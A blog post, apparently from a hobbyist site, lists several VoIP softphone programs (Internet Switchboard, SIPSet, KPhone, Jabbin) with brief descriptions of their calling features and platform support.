Internet Switchboard features include:

  • Low calling rates through MicroTelco Services
  • Auto call connect - automatic connection and least cost routing feature that connects your call using the next available carrier when the chosen carrier is unavailable
  • Least cost routing - for voice amongst leading global IP carriers
  • Automatic firewall detection
  • Automatic fax detection - allowing a fax machine to be plugged into a compatible card using the Internet SwitchBoard and route faxes to email or another fax machine via the Internet
  • International phone emulation's & connectivity
  • Low account balance warning
  • Call connect announcement
  • Auto gain control
  • Supports any type of Internet connection, including broadband
  • Microsoft Operating support including Windows 98/98SE, ME, 2000, and Windows XP


SIPSet is a SIP User Agent with a GUI front end that works with the Vovida SIP stack. You can use the SIPSet as a soft phone, to make and receives phone calls from your Linux PC.

The current release of SIPSet implements these features and functionality:

  • SIPSet can make calls through a SIP proxy.
  • SIPSet can register to receive calls through a SIP proxy.
  • SIPSet can make and receive calls directly with another User Agent.


KPhone is a SIP User Agent for Linux. It implements the functionality of a VoIP Softphone but is not restricted to this. KPhone is licensed under the GNU General Public License. KPhone is written in C++ and uses Qt.


Jabbin is an open source Jabber client program that allows free PC to PC calls using VoIP over the Jabber network.
Posted by Anonymous
Tag :

Popular Post

Labels

Blog Archive

- Copyright © _.:Learn To Hack:._ :: Hacking Tutorials :: Warez -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan -